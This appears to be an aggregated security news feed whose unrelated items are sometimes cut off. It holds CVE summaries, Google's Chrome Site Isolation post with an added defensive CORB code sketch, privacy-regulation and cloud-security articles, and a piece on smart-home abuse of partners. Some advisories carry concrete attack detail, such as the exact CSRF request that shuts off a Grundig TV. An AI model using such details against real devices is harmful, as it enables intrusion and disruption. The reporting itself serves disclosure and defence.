Techniques to Find Backdoors

Finding a website backdoor is not an easy task, because a backdoor's main purpose is to stay hidden from the website owner. However, at Sucuri we recommend the following techniques:

Whitelisting

We know what good files look like.

Continue reading Ask Sucuri: How Do You Find Website Backdoors? at Sucuri Blog.

Protecting Your Data

Even if you don’t have a Facebook account, you have undoubtedly heard the reports about how Cambridge Analytica accessed the personally identifiable information (PII) of up to 87 million users over a period of several years.

Be Strong

Looking at examples of how municipalities or governments protect these assets can help businesses plan as well. Critical infrastructure for businesses often shares similar needs with municipalities: how do we best protect servers, structures and the people who live and work in private buildings?

Keeping Your House Secure

Conversations about what can be done to keep violent weapons and dangerous materials from falling into the wrong hands continue to dominate the political discussion, leaving communities wondering about what they can do to prevent the next school or church attack.

Key Considerations

Having both specific and shared goals is what makes medical centers quite unique to security. Rarely are two buildings alike, yet they all have common needs, requirements and goals.

CVE-2018-10231

Cross-site scripting (XSS) vulnerability in TOPdesk before 8.05.017 (June 2018 version) and before 5.7.SR9 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.

CVE-2018-10635

In Universal Robots Robot Controllers Version CB 3.1, SW Version 3.4.5-100, ports 30001/TCP to 30003/TCP listen for arbitrary URScript code and execute the code. This enables a remote attacker who has access to the ports to remotely execute code that may allow root access to be obtained.

CVE-2018-10232

Cross-site request forgery (CSRF) vulnerability in TOPdesk before 8.05.017 (June 2018 version) and before 5.7.SR9 allows remote attackers to hijack the authentication of authenticated users for requests that can obtain sensitive information via unspecified vectors.

USB the Hard Way

Apple made it trickier for anyone looking to download the contents of an iOS device this week with a new feature that prevents USB accessories from communicating with devices that haven't been unlocked in an hour.

Trusted Identities

As with all major sporting and entertainment events, the goal is for everyone using a ticket to have purchased it from the authorized ticketing entity and to have a seamless experience both when they pick it up and when they present it at the venue.

Common Technology Problems That Can Negatively Affect Productivity Levels

According to a recent report by the U.S. Bureau of Labor Statistics, worker productivity levels are on a steady decline.

Generally, lower productivity levels signify a need for change within a company. Failing to notice these warning signs can lead to a business losing a lot of money.

Oftentimes, technology is one of the most common issues that leads to lower productivity levels. Utilizing the power of programs like a Kanban board is essential when trying to keep employees in the loop and projects progressing along.

The following are some of the most common technology problems that can negatively affect your company’s productivity levels.

Failing to Provide Office Technology With Proper Maintenance

Many business owners abide by the “it will never happen to me” philosophy when it comes to technology problems. In order to keep things like an office computer network functional and reliable, a business owner will have to hire professionals to maintain it.

Investing in things like network monitoring can be very helpful when attempting to find out about technology-related issues early on. Once this monitoring catches problems with the technology a business is using, IT professionals will swoop in and fix it.

Without the proper care, the business network you use on a daily basis will always be on the verge of crashing. Having a widespread network outage will lead to a lot of lost productivity and can affect your bottom line in a negative way.

Improper Technology Integration Can Cause Major Problems

If you are like most business owners, you are passionate about staying on the cutting edge of technology. Adding new software and hardware to your existing computer network isn’t as easy as you may think.

Improperly integrating new elements into a business computer network can cause major instability. Rather than trying to handle this complicated process alone, you need to think about working with seasoned IT professionals.

Before installing new hardware and software on a network, IT professionals will ensure it is compatible. There will be instances when the computer network your company uses has to be updated in order to support a new program. Not only can updating the network make the implementation of new software and hardware easier, it can fix security holes that may exist as well.

Slow and Unstable Technology Can Frustrate Employees

In order to get the most out of your employees each day, you will have to provide them with state-of-the-art technology. Letting the technology used in your office get outdated is a recipe for disaster.

When the computer network in an office runs slowly, it leads to declining productivity levels and makes employees very frustrated. Rather than making employees “just deal” with this problem, you need to find a solution quickly.

Even if you have to invest a good deal of money in updating your existing network, it will be well worth it. Before making a decision on what type of upgrades you need to make, be sure to consult with a knowledgeable IT company. In most cases, these professionals will have no problem helping you find and implement new technology in a hurry.

Fix Your Tech Problems Now!

Are you tired of losing money due to technology-related productivity issues? The only way to address these problems is by reaching out for some professional help. With the guidance of an IT professional, you should be able to find the right tools to make your job a lot easier.

The post Common Technology Problems That Can Negatively Affect Productivity Levels appeared first on TechWorm.

CVE-2018-3936

In Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312), a crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution.

CVE-2018-10197

There is a time-based blind SQL injection vulnerability in the Access Manager component before 9.18.040 and 10.x before 10.18.040 in ELO ELOenterprise 9 and 10 and ELOprofessional 9 and 10 that makes it possible to read all database content. The vulnerability exists in the ticket HTTP GET parameter. For example, one can succeed in reading the password hash of the administrator user in the "userdata" table from the "eloam" database.

CVE-2018-3932

An exploitable stack-based buffer overflow exists in the Microsoft Word document conversion functionality of the Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312). A crafted Microsoft Word (DOC) document can lead to a stack-based buffer overflow, resulting in remote code execution.

CVE-2018-3931

In Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312), a crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution. This vulnerability occurs in the `putShapeProperty` method.

CVE-2018-3930

In Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312), a crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution. This vulnerability occurs in the `vbgetfp` method.

CVE-2018-13989

Grundig Smart Inter@ctive TV 3.0 devices allow CSRF attacks via a POST request to TCP port 8085 containing a predictable ID value, as demonstrated by a /sendrcpackage?keyid=-2544&keysymbol=-4081 request to shut off the device.

CVE-2018-3929

An exploitable heap corruption exists in the PowerPoint document conversion functionality of the Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312). A crafted PowerPoint (PPT) document can lead to heap corruption, resulting in remote code execution.

CVE-2013-2951

IBM WebSphere Portal 7.0.0.x and 8.0.0.x write passwords to a trace file when tracing is enabled for the Selfcare Portlet (Profile Management), which allows local users to obtain sensitive information by reading the file. IBM X-Force ID: 83621.

CVE-2018-11529

VideoLAN VLC media player 2.2.x is prone to a use after free vulnerability which an attacker can leverage to execute arbitrary code via crafted MKV files. Failed exploit attempts will likely result in denial of service conditions.

CVE-2013-0592

Cross-site scripting (XSS) vulnerability in IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 83815.

CVE-2017-16709

Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allow remote authenticated administrators to execute arbitrary code via unspecified vectors.

CVE-2013-0594

Open redirect vulnerability in IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. IBM X-Force ID: 83383.

CVE-2017-16710

Cross-site scripting (XSS) vulnerability in Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2013-0589

IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote attackers to bypass the remote image filtering mechanism and obtain sensitive information via a crafted e-mail message. IBM X-Force ID: 83371.

CVE-2018-3933

An exploitable out-of-bounds write exists in the Microsoft Word document conversion functionality of the Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312). A crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution. This vulnerability occurs in the `vbputanld` method.

Mitigating Spectre with Site Isolation in Chrome

Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes).

What is Spectre?

In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space.

This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed. However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs.

What is Site Isolation?

Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process.

Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process.

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model.

A single page may now be split across multiple renderer processes using out-of-process iframes.

Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it. To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header.
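The CORB rule described above, as an added example that is not code from the Chrome post or from Chromium: a simplified model of the blocking decision, plus an audit of the two response headers the post asks developers to check. It assumes headers as plain objects, approximates "cross-site" as cross-origin, and reduces body sniffing to the first non-blank byte.

```javascript
'use strict';

// Added example, not code from the Chrome post or from Chromium: a simplified
// model of the Cross-Origin Read Blocking (CORB) decision, plus an audit of the
// two things the post asks developers to check (correct Content-Type and the
// nosniff header). Assumptions: "cross-site" is approximated as cross-origin,
// sniffing looks only at the first non-blank byte, and spec corner cases such
// as 206 partial responses are ignored. Headers are plain objects.

// MIME types CORB protects; text/plain only when its body sniffs as markup/JSON.
const PROTECTED_MIME_TYPES = new Set([
  'text/html', 'text/xml', 'application/xml', 'application/json', 'text/json', 'text/plain',
]);

// Lower-case the media type and drop parameters such as "; charset=utf-8".
function parseMimeType(contentType) {
  return contentType ? contentType.split(';')[0].trim().toLowerCase() : '';
}

// Fixed list plus +json / +xml structured-syntax suffixes (e.g. application/ld+json).
function isProtectedMimeType(mime) {
  return PROTECTED_MIME_TYPES.has(mime) || mime.endsWith('+json') || mime.endsWith('+xml');
}

// Case-insensitive header lookup.
function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? undefined : headers[key];
}

function hasNosniff(headers) {
  const value = getHeader(headers, 'x-content-type-options');
  return value !== undefined && value.trim().toLowerCase() === 'nosniff';
}

// Crude sniff: does the body start like HTML/XML ('<') or JSON ('{' / '[')?
function bodyLooksSensitive(body) {
  const first = (body || '').trimStart()[0];
  return first === '<' || first === '{' || first === '[';
}

// What a CORB-enabled renderer does with a subresource response.
//   request:  { origin, destination }   destination is 'image', 'script', ...
//   response: { origin, headers, body }
// Returns 'allow' (bytes reach the renderer process) or 'block' (the renderer
// sees an empty response, so a Spectre attack there has nothing to read).
function corbVerdict(request, response) {
  // Navigations are not CORB's job; Site Isolation gives cross-site documents
  // and iframes their own process instead.
  if (request.destination === 'document' || request.destination === 'iframe') return 'allow';
  if (request.origin === response.origin) return 'allow';
  const mime = parseMimeType(getHeader(response.headers, 'content-type'));
  if (!isProtectedMimeType(mime)) return 'allow';
  // With nosniff the declared Content-Type is trusted: block without sniffing.
  if (hasNosniff(response.headers)) return 'block';
  // Without nosniff, CORB confirms by sniffing so that mislabeled images and
  // scripts keep working (the "almost no impact to compatibility" part).
  return bodyLooksSensitive(response.body) ? 'block' : 'allow';
}

// Developer-side audit: will this response get the strongest CORB protection?
// Returns a list of findings; an empty list means nothing to fix.
function auditResponseHeaders(headers) {
  const findings = [];
  const mime = parseMimeType(getHeader(headers, 'content-type'));
  if (mime === '') {
    findings.push('missing Content-Type: CORB cannot classify the response');
  } else if (mime === 'application/octet-stream' || mime === 'text/plain') {
    findings.push(`ambiguous Content-Type ${mime}: declare the specific type instead`);
  }
  if (!hasNosniff(headers)) {
    findings.push('missing X-Content-Type-Options: nosniff, so CORB must fall back to sniffing');
  }
  return findings;
}

// Constructed demo: an attacker page requests a bank's JSON API as an <img>.
function demo() {
  const request = { origin: 'https://attacker.example', destination: 'image' };
  const headers = { 'Content-Type': 'application/json', 'X-Content-Type-Options': 'nosniff' };
  const response = { origin: 'https://bank.example', headers, body: '{"balance": 100}' };
  return { verdict: corbVerdict(request, response), audit: auditResponseHeaders(headers) };
}

console.log(demo()); // { verdict: 'block', audit: [] }
```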

Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure.

How does Site Isolation help?

In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.) This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre.

Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop.

What additional work is in progress?

We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process.

We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements! Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are happy to see the progress across the web ecosystem.

Help improve Site Isolation!

We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher rewards levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards.

How Local Privacy Regulations Influence CISO Spending Around the World

As local privacy regulations take effect in places like California and the U.K., security leaders around the world are sensing a shift toward stronger data privacy and transparency — and are using these laws as guidelines to help them make budgetary decisions.

The California Consumer Privacy Act was signed into law on June 28, 2018, and will take effect by 2020. The law will take an approach similar to the General Data Protection Regulation (GDPR) regarding transparency and consent around personal information. GDPR went into effect across the European Union (EU) just one month before the new law’s signing.

As under other privacy regulations, organizations in California must now ensure their customers know what kind of information they are collecting and sharing with third parties, such as advertisers and marketers. Consumers can choose to opt out of having their information collected, and companies that fail to comply risk incurring fines from the state’s attorney general.

Local Privacy Regulations Guide Private Sector Security Strategies

While GDPR and the California Consumer Privacy Act focus on how companies gather and manage data, other legislators are trying to ensure that the systems they use don’t fall prey to cybercriminals.

The U.K.’s Cabinet Office, for instance, published the first iteration of its “Minimum Cyber Security Standard” in June 2018. Though designed as a checklist for government agencies, organizations can adopt some of its practices in the private sector — such as checking websites and applications for common vulnerabilities — to keep ahead of further privacy legislation. As with more traditional privacy regulations, it outlines several mandatory requirements, including support for Transport Layer Security (TLS) encryption.

Regulatory Activity Impacts Security Budgets Around the World

These new laws and regulations reveal that chief information security officers (CISOs) from California to the U.K. are starting to use privacy regulations as a guide to determine what resources they will need to be effective.

For instance, according to a February 2018 report from consulting group Ankura, The Shifting Cybersecurity Landscape: How CISOs and Security Leaders Are Managing Evolving Global Risks to Safeguard Data, 73 percent of CISOs said regulatory activity drives their decision-making around security budgets — and all respondents said they had to comply with at least one such framework.

Even if privacy regulations like GDPR don’t directly pertain to their organizations, the Ankura report suggested that security leaders are paying close attention because they recognize that one piece of legislation can influence what other governments may demand in the future.

In other words: The effects of cybersecurity legislation in places like the E.U., the U.K. and California are reaching far past their own borders. As data privacy laws proliferate around the world, security leaders everywhere will be impacted by the shift toward greater protection and transparency.

The post How Local Privacy Regulations Influence CISO Spending Around the World appeared first on Security Intelligence.

Facebook Faces £500,000 Fine in U.K. Over Cambridge Analytica Leak

Facebook has been fined £500,000 ($664,000) in the U.K. after the country's data protection watchdog concluded that its data-sharing scandal broke the law, making it the social network's first fine over the Cambridge Analytica scandal. Yes, £500,000—that's the maximum fine allowed by the UK's Data Protection Act 1998, and equal to what Facebook earns every 8 minutes. Facebook has been

P = NP: Cloud data protection in vulnerable non-production environments

Data is the holy grail of your cloud workloads for attackers. Data breaches are the kind of breaches that make the news. With the recent European Union General Data Protection Regulations (GDPR), they will make even bigger headlines. From an enterprise point of view, the most challenging aspect of protecting data is knowing what it is and where it resides. Only when these two questions are answered can you drive data protection via organizational policies.

Most of your sensitive data is collected in production environments, the environments you know you need to protect, and you usually do. But this is only part of the story. Even though best practices mandate that sensitive information be scrubbed before it transits the organization, this cannot be ensured: it stands in contradiction to the growing adoption and improvement of shift-left testing, as well as other business needs.

Shift-left testing is the movement of testing to earlier stages in the development lifecycle. Mature testing in early stages is appreciated as it helps developers find problems earlier and in a more cost-effective manner. It also helps quality assurance teams to reproduce bugs in the system and accelerates the debugging processes.

There are other business needs for pulling data to non-production environments. In the research and analytics space, data scientists and analysts prefer to use real data to do their research effectively, whether to offer models that improve the production systems, to perform forensic and log analysis, or to bring insight to product, strategy, and marketing teams, to name a few. In the customer service space, helpdesk personnel may need to pull sensitive records to allow them to perform their jobs efficiently.

For these purposes and others, production data is being pulled not only to the staging environment, but also to development and test environments, as well as research and analytics environments. Data may even reach personal or team playgrounds. Oftentimes, the reality is that organizations disperse data across various environments, making it hard to keep track of what and where.

The following schematic depicts the flow of code from development environments to staging and production environments, along with the flow of production data back to staging, development, and research environments to allow for mature testing and business improvement at earlier stages. The latter flow may even continue to leak outside the organization's IT.

From a security point of view, the data pull should be protected, and sensitive data should not be present in a non-production environment. Synthetic fake data generation should be applied when possible, and format-preserving masking should be applied when data needs to be more realistic. However, not using real data will always impose some loss of data properties and, in turn, the data will always lack some characteristics that may be crucial for testing, and certainly for research. Therefore, to enable advanced testing at earlier stages and allow for better analytics, real data will keep being pulled out of production environments, and the associated risk will be spread throughout the organization's data stores.

To address this risk, applying perimeter solutions is a good start. But if this is your answer to the risk, then you should think again! Are you sure that once an attacker gets a hold of your sensitive data, he cannot evade detection? Are you sure that you have no malicious insiders? What is a perimeter in the cloud?

Let's take a step back and rethink the basics of what is needed from a data protection solution: beyond basic security requirements, such as role-based access control, multifactor authentication, firewalls, and encryption of data at rest and in transit, advanced threat protection should be deployed. This comprises:

  1. Visibility on where your sensitive data resides, what type of sensitive data it is, and who is accessing this data and how.
  2. Understanding the vulnerabilities of your data stores and being able to fix them.
  3. Detecting the threats and attempts made to infiltrate your data stores.

Any subset of these capabilities is going to leave weak spots in your organization's posture. For instance, if you have visibility regarding the whereabouts of sensitive data, but no knowledge of the vulnerabilities of your databases, can you be sure that any attempt to infiltrate/exfiltrate your database is detected? Test environments are commonly targeted for data breaches where real data is used for testing and development purposes, like the recent example of Shutterfly.

In addition, if you have a vulnerability in a non-production resource, most likely it exists in similar production resources as well. Finding this out gives a great deal of leverage in reconnaissance terms to attackers. They can probe and investigate non-production environments to find weak spots, then apply them to production environments, minimizing their contact with your production environments, and minimizing the probability of being caught by your threat detection solutions, in case the latter are only deployed on your production environments.

This establishes the following imperative: data protection must be an organization-wide solution, not only a production environment deployment! Hence, P = NP.

From a cloud workload protection perspective, you should build a vision of how to protect your data resources that considers your IT, DevOps, and research methodologies, as well as your data stewardship practices. Deriving a roadmap for this vision requires a solution that allows you to discover your organization's data resources, including any resources in your shadow IT infrastructure. The outcome of this methodical process, whether it is manual, semi-automated, or fully automated, should be a mapping of your data estate across all sorts of environments and an associated risk statement for each resource. This evaluation gives you a metric and can be used as a compass to secure your organization. The resources that were deemed eligible for advanced security should then be continuously monitored with advanced threat prevention solutions that keep you alerted to the vulnerabilities of your resources and the sensitivity of your data, and that provide a real-time threat detection capability. Therefore, when we are asked by customers whether they should protect their non-production environments, our answer is: P = NP!

Azure Security Center is a great built-in tool with Azure that can help you protect all your environments. It helps you assess the security state of your cloud resources, both production and non-production environments, and provides advanced threat protection against evolving threats. You can start a free trial for Azure and the Security Center, or if you're already using Azure, just open the Security Center blade to start using it today.

Are Machine Learning and Adversarial AI the New Insider Threats?

Machine learning and artificial intelligence (AI) are transitioning from proof-of-concept programs to functional corporate infrastructure. As spending on these technologies continues to drastically rise, their expanding prevalence is all but inevitable.

But the adoption of digital intelligence introduces new risk: IT experts face a steep slope of adaptations while cybercriminals look for ways to compromise new tools.

Could adversarial AI become the newest insider threat?

Why AI Won’t Replace Human Expertise

Security teams are overworked and understaffed, but some still worry that AI tools will eventually replace human expertise. In response to these concerns, Phys.org noted in June 2018 that discussions about artificial intelligence and automation are “dominated by either doomsayers who fear robots will supplant humans in the workforce or optimists who think there’s nothing new under the sun.”

New research, however, suggests that these technologies are better suited to replace specific tasks within jobs rather than wiping out occupations en masse. As reported by The Verge in June 2018, a pilot plan by the U.S. Army will leverage machine learning to better predict when vehicles need repair — taking some of the pressure off of human technicians while reducing total cost.

The same is possible in IT security: Using intelligent tools for the heavy lifting of maintenance and data collection and freeing up technology professionals for other tasks.

Will Machine Learning Reduce or Multiply Insider Breaches?

Though new technology likely won’t be stealing jobs, it could boost the risk of an insider breach. All companies are vulnerable to insider threats, which can take the form of deliberate actions to steal data or unintentional oversharing of corporate information. Since AI and machine learning tools lack human traits that underpin these risks, they should naturally produce a safer environment.

As noted by CSO Online in January 2018, however, malicious actors could leverage the same technologies to create unwitting insider threats by poisoning data pools. By tampering with data inputs, attackers also compromise outputs — which companies may not realize until it’s too late.

According to a May 2018 Medium report, meanwhile, there’s a subtler class of attacks on the rise: adversarial sampling. By creating fake samples that exist on the boundary of AI decision-making capabilities, cybercriminals may be able to force recurring misclassification, compromising the underlying trust of machine learning models in turn.

How to Thwart AI-Powered Insider Threats

With the adoption of intelligent tools on the rise, how can companies safeguard against more powerful insider threats?

Best practices include:

  • Creating human partnerships: These new tools work best in specific-task situations. By pairing any new learning tools with a human counterpart, companies create an additional line of defense against potential compromise.
  • Developing checks and balances: Does reported data match observations? Has it been independently verified? As more critical decision-making is handed off to AI and automation, enterprises must develop check-and-balance systems that compare outputs to reliable baseline data.
  • Deploying tools with a purpose: In many ways, the rise of intelligent technologies mirrors that of the cloud. At first an outlier, the solution quickly became a must-have to enable digital transition. There is potential for a similar more-is-better tendency here, but this overlooks the key role of AI and machine learning as a way to address specific pain points rather than simply keep up with the Joneses. Start small by finding a data-driven problem that could benefit from the implementation of intelligence technologies. Think of it like the zero-trust model for data access: It’s easier to contain potential compromise when the attack surface is inherently limited.

Machine learning and AI tools are gaining corporate support, and fortunately, they’re not likely to supplant the IT workforce. Looking forward, human aid will in fact be essential to proactively address the potential for next-generation insider threats empowered by compromised learning tools and adversarial AI.

The post Are Machine Learning and Adversarial AI the New Insider Threats? appeared first on Security Intelligence.

IoT domestic abuse: What can we do to stop it?

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage it. The AI locked doors, windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There have been endless works of fiction in which smart technology micromanaging the home environment has gone rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present day problems momentarily, but first let’s take a look at how we got here by casting our eye back about 15 years.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up down the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years’ imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech, and they proceed to mess with their lives remotely. One is somewhat more straightforward to approach than the other, but neither is particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPS is beneficial, because an abuser can’t see the website data. Even so, they may still see the URLs and then you’re back to square one.

With IoT, everything is considerably much more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without being noticed; frankly, people notice a physical device not behaving as it should a lot faster than they notice a covert piece of spyware, designed to grab emails from a laptop, failing to do its job.

All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There are so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A book may work for some, text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a book than keep them away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools where you can detail information that isn’t saved on the device via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.

